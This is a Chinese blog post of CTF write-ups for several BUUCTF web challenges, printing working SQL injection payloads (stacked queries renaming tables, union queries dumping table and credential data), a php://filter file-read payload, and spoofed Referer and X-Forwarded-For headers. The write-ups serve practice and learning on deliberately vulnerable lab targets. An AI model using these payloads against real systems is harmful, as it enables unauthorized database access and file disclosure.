BUUCTF-web新手进阶(一)

已于 2024-03-06 11:16:49 修改
阅读量624 收藏 8
点赞数 21
文章标签: sql 数据库
于 2024-03-05 23:02:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwyyyxxxx/article/details/136481692
版权
文章讲述了在一系列的极客挑战赛中,参赛者如何利用SQL注入、数据库操作技巧、网页源码分析和安全漏洞利用等方法解决EasySQL、SecretFile、LoveSQL和Http题目,以及Knife工具的使用。
摘要由CSDN通过智能技术生成

[强网杯 2019]随便注

万能密码:1'or 1=1#,有两个字段,省去了order by

试试union select 1,2#

 select和where被过滤了,联合查询行不通只能试试堆叠查询-1';show tables;

因为select被过滤了,所以就算堆叠查询也不能直接查flag,这里的操作是先改列名,再改表名,z最后利用题目自身的select查flag

alter table 表名 change column 旧列名 新列名 数据类型;
alter table 旧名字 rename to 新名字;
数字需要用``包裹,字符串不需要引号

注意:这里一顿操作必须在同一次进行,否则题目select报错就终止了以后的语句,只能重开

最终payload:

?inject=1%27;alter%20table%20words%20rename%20to%20word;alter%20table%20`1919810931114514`%20rename%20to%20words;alter%20table%20words%20change%20column%20flag%20id%20char(100);

再次用万能密码就能查到flag

[SUCTF 2019]EasySQL

先试试万能密码1'or 1='1被过滤了

fuzz发现union,from,flag都被过滤了,虽然堆叠查询出了表名和数据库名,但是关键词被过滤了不能常规查询,试了一下只有输入数字能有结果,但是只要输入不是零就返回1,即使是上百万

猜测拼接的参数不是在from后面,而是在select 和from的中间,假设是:
select 0,$query from Flag;

这里返回的数据和输入不怎么对的上,具体我也不知道为什么,但是证明了确实是拼接在select和from中间

那么既然不让输入from,那就直接用题目自身的from,将题目的查询语句从中间分开

猜测拼接后语句类似这个:
select 1;select * from Flag;

最终payload:query=1;select *,1

[极客大挑战 2019]Secret File

f12查看源码发现./Archive_room.php,访问

再次得到action.php,这里action.php做了个重定向,302状态码表示重定向,通过burp suite抓包发现secr3t.php

访问secr3t.php得到最后的源码

根据提示get提交file=flag.php,发现看不到flag

上伪协议,将最下面的base64编码的数据解码即可

?file=php://filter/convert.base64-encode/resource=flag.php

[极客大挑战 2019]LoveSQL

 先试试万能密码,登陆成功但是返回的密码是一个md5值

username=admin&password=-1'order by 3#(url编码为%23)查字段数,在order by 4时出错说明有三个字段,以下payload均为浏览器直接提交的值,burpsuite提交需要url编码

username=admin&password=-1'union select 1,2,3%23    看回显

查表名 

username=admin&password=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

查列名 

username=admin&password=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#

查数据 

username=admin&password=-1'union select 1,group_concat(id,username,password),3+from l0ve1ysq1#

[极客大挑战 2019]Http

f12查看源码,Secret.php藏在了最后的后面部分

提示了不是来自https://Sycsecret.buuoj.cn,用burpsuite改包,加上请求头

Referer: https://Sycsecret.buuoj.cn

然后提示用”Syclover" browser,那就在User-Agent的中间任意位置加上Syclover

最后一关添加请求头X-Forwarded-For

X-Forwarded-For:127.0.0.1    //表示来自127.0.0.1即本地连接

[极客大挑战 2019]Knife

这题考的菜刀这个工具的使用,用蚁剑或者其他连接工具也是一样的,密码就是post的参数

@Wyx
关注
  • 21
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在PHP编程中,变量覆盖漏洞是一种常见的安全问题,它允许攻击者通过自定义的参数值替换原有的变量值,从而可能导致敏感信息泄露或者执行非法操作。这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: 在...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-web新手进阶(二)
wwwyyyxxxx的博客
03-06 421
上传成功了,但是没有显示路径,一般上传路径都是相对路径upload/或者uoloads/,这里访问upload/1.jpg成功,将1.jpg改成1.phtml,上传成功用蚁剑连接。万能密码1'or 1='1报错了1=’1‘有语法错误,应该是or被过滤了,双写绕过。然后就是常规sql注入流程,by也被过滤,一样双写,查到4报错,那就是三个字段。提示有备份文件的习惯,那就是说有源码的备份文件,访问www.zip得到源码。和上题一样的方法,传.phtml文件名,连蚁剑。随便传个图片马,显示路径了,
BUUCTF-菜刀666
qq_44005305的博客
03-02 1013
题目:使用wireshark打开数据流:看题目就知道应该是一个菜刀的流量,也就是HTTP流量。
攻防世界新手Web(二)
qq_45746876的博客
12-03 364
攻防世界新手Web(二)前言题目与wpsimple_phpget_postxff_refererwebshellcommand_executionsimple_js总结 前言 又是几天没有更新博客了,是有那么一丢丢懒哈哈,不过最近有考试(借口),这可不能怪我嗷。今天依旧是给小榆和各位小伙伴分享一波最近在攻防世界的wp,之后除了考试和复习会按时更新的啦~ 高手进阶区和XUUCTF那边我也会去踩坑的,让小榆和大家见到一只菜鸟的成长叭。 题目与wp simple_php get_post xff_referer
算法分析:BUUCTF-2019全国赛的一道逆向题
qq_44005305的博客
08-27 831
5.运行到这里看到了flag字符,估计接下来就是出现flag的时候了,继续单步执行到正确flag提示信息出现前是这些代码,由于没有什么算法存在,这些代码知识用来拼接flag的所以就不分析了flag/Arg3 =0000000A;|Arg1 =00000078ok了,最后的信息框提示了flag-0x20C][外链图片转存中…(img-rGLNigrP-1693020800931)]ok了,最后的信息框提示了flag。
2024版最新WEB安全入门指南(非常详细)零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-26 960
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…,你发现一个综合的项目涉及到方方面面,你各个方面可能都不太会,这时候你要对技能树进行梳理,哪些是需要舍去的,哪些是需要加固到最低要求的,哪些是自己主要方向需要不断强化的。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4391
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
【2024最新】CTF入门教程(非常详细)从零基础入门到进阶,看这一篇就够了!_ctf教程
ewii12567的博客
06-28 1479
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
【2024最新】CTF入门教程(非常详细)从零基础入门到进阶,看这一篇就够了!
韩束一叶子
07-03 934
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
2401_82672634的博客
07-25 1315
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 174
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
sql】MySQL 中的数值格式化函数:FORMAT、ROUND 和 TRUNCATE
longforone的博客
08-15 332
FORMAT。
Python中使用SQLModel操作MySQL数据库的详细教程,附多个实战案例及其完整源码
最新发布
Python私教
08-16 52
【代码】Python中使用SQLModel操作MySQL数据库的详细教程,附多个实战案例及其完整源码。
4.1 SQL的起源与发展
在路上的专栏
08-16 496
SQL(结构化查询语言)是数据库管理的基石,自20世纪70年代诞生以来,它不断发展和演化,成为全球最广泛使用的数据查询语言。本文将通过生动的故事和易于理解的语言,带你了解SQL的起源、发展历程及其对现代数据库管理的深远影响。文章内容既适合数据库新手,也对专业人士具有参考价值。
变量覆盖漏洞分析:从BUUCTF-Web-Mark loves cat挑战看PHP安全
此外,还介绍了如何利用变量覆盖漏洞,并通过一个具体的CTF(Capture The Flag)挑战实例来展示如何通过分析网站源代码和利用.git泄露来获取敏感信息。" 在PHP编程中,变量覆盖漏洞是一个重要的安全问题,它发生在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值